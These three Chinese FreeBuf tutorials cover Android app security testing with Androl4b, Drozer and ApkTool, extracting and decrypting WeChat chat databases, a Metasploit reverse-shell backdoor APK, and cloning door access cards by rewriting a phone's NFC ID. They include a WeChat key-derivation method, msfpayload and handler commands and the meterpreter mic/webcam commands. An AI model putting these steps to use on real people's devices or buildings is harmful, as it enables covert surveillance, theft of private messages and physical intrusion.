使用Androl4b进行安卓APP安全测试(Part 1)

作者:雪碧0xroot@漏洞盒子安全团队

文章首发地址:

http://www.freebuf.com/articles/terminal/110374.html

0x00 前言

移动客户端Ap测试中,相信有很多小伙伴都是在自己常用的手机中安装上需要测试的App。这种方法是比较常见的一种,但是常用的手机中难免会有其它不相关的App在后台运行、进行网络请求,导致我们拦截到很多测试中不需要要的数据包甚至有的情况下我们无法辨别数据包是否是需要测试的App发出的请求。介于这种情况我们需要一个更干净的测试环境来对移动端App进行测试。

0x01工欲善其事必先利其器

Androl4b是一个基于ubuntu mate的安卓安全评估&测试的系统,系统集成了一系列Android 应用程序评估测试所需的工具,可用于逆向工程和恶意软件分析,为安卓测试、安全研究从业人员节省了大量环境搭建配置所需的时间、精力。

Clipboard Image.png

Clipboard Image.png

该工具的中文介绍可参阅:工具推荐:Androl4b,安卓安全评估测试利器  一文。

下载链接:http://pan.baidu.com/s/1dEfkwLV 密码:57gu

MD5Sum : 0c2346b1dbd769e3eb2069026a3c8efe
SHA1Sum : 1119e5e225094191739281670e2aa6400a15f80f

0x02 系统优化

下载解压完成后,可在虚拟机中直接启动Androl4b:

账户:andro

密码:androlab

Clipboard Image.png

使用过程中发现系统中已经集成JDK环境、Android Studio、Pyhton、Wireshark、BurpSuite等常用工具,由于工具是老外打包的,所以系统里边没安装中文语言。

2.1 设置DNS

System->Control Center->Network->DNS:

Clipboard Image.png

sudo apt-get update

2.2 安装中文语言包

System->Control Center->Language Support->Install/Remove Languages->Chines (simplified)

Clipboard Image.png

Apply Changes使配置生效,账户输入密码后便开始下载语言文件:

Clipboard Image.png

下载完成后把Chines拖到第一项(位于English前一位),把中文作为系统语言首选项。重启系统后,配置生效。也可以通过下面的步骤修改系统配置文件把中文作为首选项:

2.3 修改系统语言配置文件

修改local文件:

sudo vim /var/lib/locales/supported.d/local
//删除所有内容,增加以下内容:
zh_CN.UTF-8 UTF-8
zh_CN GB2312
zh_CN.GBK GBK
en_US.UTF-8 UTF-8
fr_FR ISO-8859-1
zh_CN.GB18030 GB18030

生成相关的locales:

sudo locale-gen --purge

修改设置默认语言:

sudo vim /etc/default/locale
//删除所有内容,增加以下内容:
LANG="zh_CN.UTF-8"
LANGUAGE="zh_CN:zh"
LC_NUMERIC="zh_CN.UTF-8"
LC_TIME="zh_CN.UTF-8"
LC_MONETARY="zh_CN.UTF-8"
LC_PAPER="zh_CN.UTF-8"
LC_IDENTIFICATION="zh_CN.UTF-8"
LC_NAME="zh_CN.UTF-8"
LC_ADDRESS="zh_CN.UTF-8"
LC_TELEPHONE="zh_CN.UTF-8"
LC_MEASUREMENT="zh_CN.UTF-8"

修改完成后重启系统,最终效果:

Clipboard Image.png

0x03 安卓虚拟机

Emulator安卓模拟器是目前使用最方便的安卓模拟器,无需安装任何插件,下载安装后直接点击运行。支持windows、Linux系统。Androl4B中已经安装了该工具,并且有一个名为lab的虚拟安卓设备:

Clipboard Image.png

3.1 为虚拟设备设置代理

终端执行

emulator -avd lab -no-audio -http-proxy http://127.0.0.1:8090

3.2 配置Burp Suite

3.2.1 增加代理

Applications->tools->BurpSuite  Proxy->Option-add->Bind to port 8090

Clipboard Image.png

3.2.2 监听127.0.0.1:8090

Clipboard Image.png

使用系统自带浏览器打开一个网站,测试能否拦截到网络请求:

Clipboard Image.png

Burp Suit成功拦截到了安卓虚拟机中的网络请求。

0x04 ADB的一些使用

4.1 显示系统中的全部安卓平台

android list targets

Clipboard Image.png

4.2 列出电脑连接的设备

adb devices

Clipboard Image.png

emulator-5554设备为emulator模拟器模拟的安卓手机,LGD857是我连接到电脑中的手机。

4.3 安装应用程序

adb install xxx.apk

Clipboard Image.png

4.3.1 拦截App通信数据包:

Clipboard Image.png

4.4 获取模拟器中的文件:

adb pull  

4.5 向模拟器中写文件:

adb push  

4.6 进入模拟器的shell模式:

adb shell

Clipboard Image.png

4.7 卸载模拟器中的App

adb uninstall com.sina.weibo

0x05 Drozer

Clipboard Image.png

5.1 工具介绍

Drozer原名mercury,是一款Android安全审计与攻击框架,该工具分为免费版(社区版)和专业版,专业版增加了GUI界面这类的一些功能。

5.2 工具站点

工具介绍下载地址:https://labs.mwrinfosecurity.com/tools/drozer/

工具GayHub开源项目地址:https://github.com/mwrlabs/drozer/

5.3 工具安装

Androl4b中已有这个工具,我们在终端执行、查看一下帮助信息:

andro@l4b:~$ drozer
usage: drozer [COMMAND]

Run `drozer [COMMAND] --help` for more usage information.

Commands:
          console  start the drozer Console
           module  manage drozer modules
           server  start a drozer Server
              ssl  manage drozer SSL key material
          exploit  generate an exploit to deploy drozer
            agent  create custom drozer Agents
          payload  generate payloads to deploy drozer
andro@l4b:~$ drozer console --help
usage: drozer console [OPTIONS] COMMAND

Starts a new drozer Console to interact with an Agent.

The drozer Console connects to an Agent and allows you to interact with the
system from the context of the agent application on the device. The console
can connect directly to an agent, if its embedded server is enabled, or through
a drozer Server that the agent is connected to.

positional arguments:
  command               the command to execute
  device                the unique identifier of the Agent to connect to

optional arguments:
  -h, --help            show this help message and exit
  --server HOST[:PORT]  specify the address and port of the drozer server
  --ssl                 connect with SSL
  --accept-certificate  accept any SSL certificate with a valid trust chain
  --debug               enable debug mode
  --no-color            disable syntax highlighting in drozer output
  --password            the agent requires a password
  -c ONECMD, --command ONECMD
                        specify a single command to run in the session
  -f [FILE [FILE ...]], --file [FILE [FILE ...]]
                        source file

available commands:
  commands    shows a list of all console commands                              
  connect     starts a new session with a device                                
  devices     lists all devices bound to the drozer server                      
  disconnect  disconnects a drozer session                                      
  version     display the installed drozer version  

接下来我们需要在Emulator安装Drozer。

5.3.1 运行安卓模拟器(Terminal ①):

emulator -avd lab

5.3.2 下载Drozer APK文件(Terminal ②):

wget https://labs.mwrinfosecurity.com/system/assets/934/original/drozer-agent-2.3.4.apk

5.3.3 把Drozer安装到安卓模拟器中:

adb install drozer-agent-2.3.4.apk

Clipboard Image.png

5.4 开始使用

5.4.1 在安卓虚拟机中运行drozer Agent App,打开Embbdded Server:

Clipboard Image.png

5.4.2 使用 adb 进行端口转发,转发到 Drozer使用的端口 31415,并进入Drozer 控制台:

adb forward tcp:31415 tcp:31415
drozer console connect

Clipboard Image.png

run $module    执行Drozer功能模块
list       列出Drozer所有功能模块
dz> list
app.activity.forintent      Find activities that can handle the given intent    
app.activity.info           Gets information about exported activities.         
app.activity.start          Start an Activity                                   
app.broadcast.info          Get information about broadcast receivers           
app.broadcast.send          Send broadcast using an intent                      
app.broadcast.sniff         Register a broadcast receiver that can sniff        
                            particular intents                                  
app.package.attacksurface   Get attack surface of package                       
app.package.backup          Lists packages that use the backup API (returns true
                            on FLAG_ALLOW_BACKUP)                               
app.package.debuggable      Find debuggable packages                            
app.package.info            Get information about installed packages            
app.package.launchintent    Get launch intent of package                        
app.package.list            List Packages                                       
app.package.manifest        Get AndroidManifest.xml of package                  
app.package.native          Find Native libraries embedded in the application.  
app.package.shareduid       Look for packages with shared UIDs                  
app.provider.columns        List columns in content provider                    
app.provider.delete         Delete from a content provider                      
app.provider.download       Download a file from a content provider that        
                            supports files                                      
app.provider.finduri        Find referenced content URIs in a package           
app.provider.info           Get information about exported content providers    
app.provider.insert         Insert into a Content Provider                      
app.provider.query          Query a content provider                            
app.provider.read           Read from a content provider that supports files    
app.provider.update         Update a record in a content provider               
app.service.info            Get information about exported services             
app.service.send            Send a Message to a service, and display the reply  
app.service.start           Start Service                                       
app.service.stop            Stop Service                                        
auxiliary.webcontentresolver
                            Start a web service interface to content providers. 
exploit.jdwp.check          Open @jdwp-control and see which apps connect       
exploit.pilfer.general.apnprovider
                            Reads APN content provider                          
exploit.pilfer.general.settingsprovider
                            Reads Settings content provider                     
information.datetime        Print Date/Time                                     
information.deviceinfo      Get verbose device information                      
information.permissions     Get a list of all permissions used by packages on   
                            the device                                          
scanner.activity.browsable  Get all BROWSABLE activities that can be invoked    
                            from the web browser                                
scanner.misc.native         Find native components included in packages         
scanner.misc.readablefiles  Find world-readable files in the given folder       
scanner.misc.secretcodes    Search for secret codes that can be used from the   
                            dialer                                              
scanner.misc.sflagbinaries  Find suid/sgid binaries in the given folder (default
                            is /system).                                        
scanner.misc.writablefiles  Find world-writable files in the given folder       
scanner.provider.finduris   Search for content providers that can be queried    
                            from our context.                                   
scanner.provider.injection  Test content providers for SQL injection            
                            vulnerabilities.                                    
scanner.provider.sqltables  Find tables accessible through SQL injection        
                            vulnerabilities.                                    
scanner.provider.traversal  Test content providers for basic directory traversal
                            vulnerabilities.                                    
shell.exec                  Execute a single Linux command.                     
shell.send                  Send an ASH shell to a remote listener.             
shell.start                 Enter into an interactive Linux shell.              
tools.file.download         Download a File                                     
tools.file.md5sum           Get md5 Checksum of file                            
tools.file.size             Get size of file                                    
tools.file.upload           Upload a File                                       
tools.setup.busybox         Install Busybox.                                    
tools.setup.minimalsu       Prepare 'minimal-su' binary installation on the     
                            device. 
shell    进入Drozer Agent App的shell交互界面
 dz> shell
u0_a343@g3:/data/data/com.mwr.dz $ 

5.5 工具功能

5.5.1 列出模拟器设备中所有已经安装的App包列表

run app.package.list

Clipboard Image.png

5.5.2 列举APP的详细信息:

在文章第一部分我们安装了新浪微博,这里便以微博为例:

利用关键词“weibo”进行搜索得出包名:

dz> run app.package.list -f weibo
com.sina.weibo (微博)
dz> 

查看包信息:

run app.package.info -a  com.sina.weibo

Clipboard Image.png

通过上述方式,我们已经获得应用数据目录、apk的路径、UID、GID等信息。
5.5.3 APP攻击面分析&查找应用的IPS漏洞:

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
  139 activities exported
  21 broadcast receivers exported
  1 content providers exported
  16 services exported

微博中存在139个暴露的activity ,我们可以使用下面这条命令查看app的activity:

5.5.4 获取activity信息

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
  com.sina.weibo.MainTabActivity
    Permission: null
  com.sina.weibo.composerinde.ComposerDispatchActivity
    Permission: null
..................省略若干........................
  com.sina.weibo.richdocument.RichDocumentDispatchActivity
    Permission: null
  com.sina.weibo.notepro.NoteActivity
    Permission: null

dz>

5.5.5 Reading from Content Providers

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
  Authority: com.sina.weibo.sdkProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.sina.weibo.provider.SinaWeiboSdkProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

5.5.6 Database-backed Content Providers (Data Leakage)

由于在写文章测试的过程中,没有找到合适的App来演示数据泄露利用模块以及sql注入模块的功能,直接贴一下使用指南中的案例演示:

dz> run scanner.provider.finduris 
-
a com.mwr.example.sieve 
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.
example.sieve.DBContentProvider/
... 
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys 
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

利用

dz> run app.provider.query 
content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64
-
encoded)
email: incognitoguy50@gmail.com

5.5.7 Database-backed Content Providers (SQL Injection)

dz> run app.provider.query content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
projection "'" 
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

dz> run app.provider.query 
content://com.mwr.example.sie
ve.DBContentProvider/Passwords/
--
selection "'" 
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords 
WHERE (')

Droer 使用指南

Drozer的更多功能、使用方法可参阅:Drozer 使用指南 : https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

0x06 ApkTool

6.1 工具介绍

Clipboard Image.png

ApkTool是谷歌提供的APK编译工具,支持反编译及回编译apk。同时安装反编译系统apk所需要的framework-res框架,清理上次反编译文件夹等功能。使用该工具需安装Java环境。

6.2 decode

decode命令用于进行反编译apk文件:

apktool decode xx.apk

Clipboard Image.png

反编译完成,我们可以看到一个”weibo”目录,目录中有一个AndroidManifest.xml文件:

Clipboard Image.png

通过分析AndroidManifest.xml,我们可以获取到这些信息:包名、版本信息、Activity组件等:

Clipboard Image.png

在标签当中我们可以找到所有的activity:

Clipboard Image.png

0x07 refer

https://blogs.mcafee.com/mcafee-labs/testing-android-application-security-part-1/

https://github.com/sh4hin/Androl4b

工具推荐:Androl4b,安卓安全评估测试利器

Drozer 使用指南 : https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

blogs.mcafee.com : How to: Testing Android Application Security, Part 2

maxwithcoco.com : drozer:某APK ContentProvider安全测试

*本文作者:雪碧0xroot@漏洞盒子安全团队,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

移动安全:窃取微信聊天记录、Hacking Android with Metasploit

在这篇文章中我们将讨论如何窃取安卓、苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制。文章比较基础、可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对移动终端的安全兴趣。

(文章内容存在一定攻击性,目的在于普及终端安全知识、提高安全意识,如有非法使用,后果自负)

一:如何窃取Android、iPhone手机上的微信聊天记录?

0x00 条件:

安卓设备已获取root权限,安装SSHDroid(通过ssh、ftp连接手机)

Apple设备越狱,安装OpenSSH插件

0x01 安卓:

很多安卓手机的用户都会遇到这么一个尴尬的问题:手机用久了就不知不觉变得慢了,最后慢到什么都迟钝了。为了解决这个问题和大多数人一样我选择了root设备。

安卓设备在root以后可以对系统文件存在最高级别的操作权限。比如,你在安卓设备上安装了微信,那么root以后通过adb shell你能对微信App的文件配置进行读取修改等操作。

Android应用程序的数据库文件通常会保存在 /data/data/packagename/database 文件夹下,微信App文件存放路径为:/data/data/com.tencent.mm/MicroMsg

图片1.png

首先通过FTP把文件down到本地:

图片2.png

以34位编码(类似于乱码)命名的文件夹中可找到微信账号的加密数据库文件 :EnMicroMsg.db

图片3.png

用数据库管理器打开:提示加密或者不是数据库文件

图片4.png

这里可以用windows环境下的SQLite Database Browser浏览器打开:

图片5.png

 

提示输入密码:

图片6.png

那么,加密数据库使用的密码是什么呢?我们又该如何获取到这个密码?通过上网查资料了解到:微信采用手机的IMEI值和微信UIN值的组合来对数据进行加密。

微信账号uin:即user information 微信用户信息识别码,获取微信UIN的方式有两种:

1.通过微信app的“system_config_prefs.xml”配置文件获取微信账号uin;

2.通过抓取WEB版微信聊天的数据包获取到uin。

1.1 App 配置文件

find / -name “system_config_prefs.xml”

图片7.png

/data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml
cat /data/data/com.tencent.mm/shared_prefs/system_config_prefs.xml | grep uin

Clipboard Image.png

<int name="default_uin" value="146****21" />

1.2 谷歌chrome浏览器登陆WEB版微信:

图片8.png

登陆后新建窗口并访问chrome://net-internals/#events

发送信息 抓包 find uin值

图片9.png

uin:146****21

图片10.png

通过上述两种方法找到的uin值是相同的。

安卓拨号界面输入*#06#获得手机IMEI码:354**********85

SIM值+uin值组合即为146****21354**********85

md5: http://www.spriteking.com/cmd5/ 左侧加密

Clipboard Image.png

得到32位小写md5值:a1edf9f5********************b5e5

取其前七位:a1edf9f输入到sql浏览器中,成功打开微信的数据库文件:

图片12.png

图片13.png

0x02 苹果:

Apple设备越狱后可通过Cydia安装各种小插件,通常情况我会安装OpenSSH来使自己能通过终端连接到Apple设备中,并使用sftp传输文件:

IMG_0716.JPG

iOS中,应用文件夹以hash值命名,要导出微信、QQ的聊天记录其难度相对安卓来说稍微复杂很多。

在实际操作中我们可以通过巧用Linux命令(find、grep、xargs)来绕过这些坑。

find /var/mobile/Containers/Data -name "MM.sqlite" 

mkdir /cache
find /var/mobile/Containers/Data -name "MM.sqlite" |xargs -I {} dirname {} | xargs -I {} cp -r  {}/../../ /cache

在越狱iOS窃取隐私可参考:帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息 一文

0x03 在安卓终端植入后门

3.1 实验环境

Kali Linux(Hack):192.168.31.213

Android(靶机):192.168.31.118

3.2生成后门文件:

cd Desktop
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.31.213 LPORT=443 R >0xroot.apk

Clipboard Image.png

3.3 运行metasploit控制台

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.31.213
set LPORT 443
run

Clipboard Image.png

3.4 安装&运行后门App

Screenshot_2016-06-27-14-04-48.pngScreenshot_2016-06-28-15-50-59.png

后门能进行什么操作?我们来看看usage:

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getuid        Get the user that the server is running as
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam

record_mic 通过手机麦克风进行窃听、录音;

webcam_list 列出安卓设备的所有摄像头;

webcam_snap 通过摄像头进行偷拍…

等等

0x04 演示视频

http://v.qq.com/iframe/player.html?vid=e0309wvais4&tiny=0&auto=0

0x05 APK后门分析:

把apk放到apk分析工具(apkStudio、Bytecodeviewer)进行解包,我们来看看后门App的源码:

Clipboard Image.png

(apkStudio)

在smali/com/metasploit/stage/MainActivity.smali中我们可以找到后门服务器的ip端口配置:

1111.png

(apkStudio)

Clipboard Image.png

(Bytecodeviewer)

0x06 预防&安全建议

安卓:从可信来源下载应用程序,避免感染恶意程序;在移动充电桩充电前及时关闭USB调试。

苹果:越狱后及时修改root密码,避免使用默认密码、弱口令。

0x07 文中工具下载地址:

SQLite Database Browserhttp://pan.baidu.com/s/1nuWlDgd

SSHDroid:http://pan.baidu.com/s/1b6PBK6

0×08 参考&感谢

How To Decrypt WeChat EnMicroMsg.db Database?

Android微信数据导出

微信聊天记录分析

A look at WeChat security

https://gist.github.com/scturtle/7248017

帮女神修手机的意外发现:隐匿在iOS文件系统中的隐私信息

Hacking Android Smartphone Tutorial using Metasploit

RFID Hacking:看我如何突破门禁潜入FreeBuf大本营

本文原创作者:雪碧0xroot

https://imgcache.qq.com/tencentvideo_v1/playerv3/TPout.swf?max_age=86400&v=20161117&vid=q0168hd3qxj&auto=0

某天,偶然间拿到了FreeBuf Pnig0s同学的工卡信息,终于有机会去做一些羞羞的事情了ಥ_ಥ……

事了拂衣去,深藏功与名……

引子

以下故事纯属虚构,如有雷同,纯属巧合。

我应聘了一个大型IT公司的"网络攻击研究部经理" 职务,面试官问我: 你觉得自己为什么适合这份工作? 我:我黑进你们的系统,给我自己发了面试通知。

很经典的一个视频:黑客通过入侵大楼灯光控制系统,打起了游戏

http://www.56.com/iframe/NjYxNDg2NzU

最后上个真实的案例:线上的网络安全 VS 线下的物理安全

前几天媒体曝出:Dr.Web因揭露ATM木马遭报复,实验室两次遭燃烧弹攻击 @网路游侠 戏称:你线上查杀我的木马,我线下烧你的实验室… 防恶意软件的战争终于实现了o2o

什么时候安全从业者也成了高危职业人群 -。-!看到这里,不禁让人想起一句话:又到了毕业找工作的时候了,好多朋友打电话向我咨询要不要让孩子X(xue 学)X(I 挨)X(T 踢),作为一个业内资深人士,我觉得这不能一概而论。要辩证的看这个问题,视孩子具体的情况,具体问题具体分析。譬如说,如果是亲生的,就尽量不要。

0x00 背景

2008年,德国研究员亨里克·普洛茨和美国弗吉尼亚大学计算机科学在读博士卡尔斯滕·诺尔利用电脑成功破解了恩智浦半导体的Mifare经典芯片(简称MI芯片)的安全算法。他们所破解的MI芯片的安全算法,正是目前全世界应用最广泛的非接触IC卡的安全算法!

市场接受度较高的M1卡被破解之后,国内IC卡标准一度陷入混乱,这种现象直到现在也并未完全解决。

以当前流行门禁读卡器的算法区分,除了Mifare1之外,市场上主要还有DES、3DES、AES、SM1、SM7等。其中DES为美国IBM公司研制,是美国数据加密标准,3DES则为其升级版本;AES为美国联邦政府采用的一种区块加密标准,是密码学中的高级加密标准。

目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,没有去进行加密认证或开发专用的密钥,其安全隐患远比Mifare卡的破解更危险,非法破解的人士只需采用专业的技术手段就可以完成破解过程。

导致目前国内大多数门禁产品都不具备安全性原因之一,是因为早期门禁产品的设计理论是从国外引进过来的,国内大部分厂家长期以来延用国外做法,采用ID和IC卡的只读特性进行身份识别使用,很少关注卡片与门禁机具间的加密认证,缺少安全密钥体系的设计,而ID卡是很容易可复制的载体,导致此类门禁很容易在极短时间内被破解和复制。

0x01 NFC概要

NFC是英文Near Field Communication 的缩写,中文译为近距离无线通讯技术(ISO 18092)。最初是由飞利浦公司和索尼公司共同开发的。

NFC是一种非接触式识别和互联技术,可以在移动设备、消费类电子产品、PC和智能控件工具间进行近距离(小于四厘米 )无线通信。NFC提供了一种简单、触控式的解决方案,可以让消费者简单直观的交换信息、访问内容与服务。手机用户凭着配置了支付功能的手机就可以行遍全国:他们的手机可以用作机场登机验证、大厦的门禁钥匙、交通一卡通、信用卡、支付卡等等

NFC与RFID

RFID:射频识别技术,它主要是通过无线电讯号识别特定目标,并可读写数据(单向的读取)。   
RFID系统的频率分低频、高频、超高频和微波几种,其各自的工作频率如下:
低频(LF)     125~134kHz;
高频(HF)     13.56MHz;
超高频(UHF)   860~960MHz;
微波(MW)     2.45GHz和5.8GHz。

RFID无源卡按载波频率分为:低频、中频和高频射频卡。
低频射频卡:频率主要包括125kHz和134kHz两种,主要用于短距离、低成本的应用中,如多数的门禁控制、校园卡、货物跟踪等。
中频射频卡:频率主要为13.56MHz,主要用于门禁控制和需传送大量数据的应用系统。
高频射频卡:频率主要包括433MHz、915MHz、2.45GHz、5.8GHz等,可应用于需要较长的读写距离和高读写速度的场合,在火车监控、高速公路收费等系统中有广泛应用。

NFC是近距离无线通讯技术,芯片具有相互通信能力,并有计算能力。NFC可以看作是RFID的子集,用的是RFID的高频(13.56MHz)的标准,与RFID不同的是NFC的通讯是双向过程。

0x02 门禁系统解决方案

门禁系统由门禁考勤管理软件(PC端)、门禁读头、门禁控制器、电锁、门禁卡(NFC手机)组成

0x03 门禁卡类型

智能卡一般可分为接触式、非接触式。
接触式智能卡读卡器必须要有插卡槽和触点。以供卡片插入接触电源,有使用寿命短,系统难以维护,基础设施投入大等缺点,但发展较早。
非接触式智能卡又称射频卡,是近几年发展起来的新技术。它成功地将射频识别(RFID)技术和EM卡技术结合起来,将具有微处理器的集成电路芯片和天线封装于塑料基片之中。读写器采用兆频段及磁感应技术,通过无线方式对卡片中的信息进行读写并采用高速率的半双工通信协议。其优点是使用寿命长,应用范围广,操作方便、快捷,但也存在成本高,读写设备复杂,易受电磁干扰等缺点。目前,非接触式卡片的有效读取距离一般为50~200mm,最远读取距离可达数米(应用在停车场管理系统)。

门禁卡(属于智能IC卡)主要是如下几种卡:EM卡、M1卡、TM卡和CPU卡等等。
IC卡:集成电路卡,是继磁卡之后出现的又一种新型信息工具。在有些国家和地区也称智能卡(smart card)、智慧卡(intelligent card)、微电路卡(microcircuit card)或微芯片卡。目前IC卡已经十分广泛地应用于包括金融、交通、社保等。
IC卡中有一种只读卡(只能通过读卡器读出卡号(ID号),而且卡号是固化(不能修改)的,不能往卡的分区再写数据,这种非接触卡我们把它称为ID卡。

从设备与卡的算法来区别

M1卡:存储了ID号,可读写数据,M1卡发一个数据到设备,设备再传一个数据给M1卡确认,再进行交易或身份认证;
CPU卡:有操作系统,可存储数据,也有自己的ID号;(既然提到了ID号,那我们再来说一下ID卡)
ID卡:只存储了ID号,设备识别ID号,没有算法可言,容易复制,安全性低;


0x04 小区门禁

(小区非接触型门禁一体机面板正面)

(小区非接触型门禁一体机面板背面)

工作频率:

13.56MHz

门禁接线图

NFC门禁潜在风险:

风险1:门禁使用初始密码(弱口令) 轻易进入编程模式

有些小区的物业管理和服务器管理员一样,都存在安全意识不足现象而使用初始密码或者使用一些弱口令的问题。通过这一图片我们可以发现:进入编程模式以后,我们可以轻易地进行一些加卡、删卡操作。

风险2:门禁只验证门禁卡ID号,导致门禁卡被轻易伪造、复制

白卡:NFC卡片生产商没有按照国家标准进行生产(国家标准要求正规厂家生产的每一张ID卡都必须写入唯一的物理号,不能重复。但一些非正规厂家生产的白卡根本就没有写入物理号,进入市场后,商家就可以随时“复制”写入)。

M1卡虽然可以加密,文章开头也提及:早在2008年就被宣布可以被破解。虽然M1卡可以对存储信息进行加密,但复制过程并不需要解密,两张卡之间复制信息,就像电脑之间用U盘拷贝资料一样,读取和写入都无需破解,复制的卡一样可以使用。

前段时间闲得无聊写了一篇《如何用神奇的build.prop低调奢华有内涵地装X》,通过这类文章,不难得出:root以后,安卓手机的很多系统参数都可以通过修改系统配置文件来实现,其实NFC也一样。现在很多安卓机都支持NFC功能(such as:小米、锤子、LG、HTC、一加),文章开头我们提到:目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,那么我们也可以修改手机NFC的配置文件来改变手机NFC的ID值以此来伪造(模拟)门禁卡。《如何利用Nexus 5伪造一张门禁卡》一文也充分地说明了这种方法地可行性,

未修改手机配置文件,去刷门禁是这样的:(此次使用的手机型号为LG G3)

错误码030201

通过对手机NFC的读取得知手机的ID(固定ID)为

01:02:03:04 
标签ID(hex)01 02 03 04
标签ID(dec)67305985

读取一张有效的门禁卡:

手机和门禁卡的ID(hex)都为8位;

手机开启SSHD服务(可使用app:SSHDroid)

FTP登陆(手机处于电脑同一局域网),下载系统的NFC配置文件libnfc-brcm.conf 、libnfc-nxp-lg.conf、libnfc-nxp.conf(上传下载的过程中建议使用Root File Explorer RE文件管理器将系统目录挂载为读写

数据分析:通过对系统配置文件代码、参数的审计发现libnfc-brcm.conf 、libnfc-nxp-lg.conf、libnfc-nxp.conf里边的一些参数为十六进制:

libnfc-nxp-lg.conf、libnfc-nxp.conf两个配置文件都存在“01, 02, 03, 04,”

参数定位

bingo,直接改为有效门禁的hex ID,然后再使用FTP将修改后的文件上传(建议将原始文件改为xx.bak,系统文件错误修改造成的问题可通过恢复这几个文件解决)。

最后reboot手机,开启手机NFC去门禁刷卡验证。

文章里边提及的App和NFC相关的一些工具:链接: http://pan.baidu.com/s/1sj45hLV 密码: 788j

*参考:百度、谷歌、wiki,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

本文首发于FreeBuf

原文地址:http://www.freebuf.com/news/special/80786.html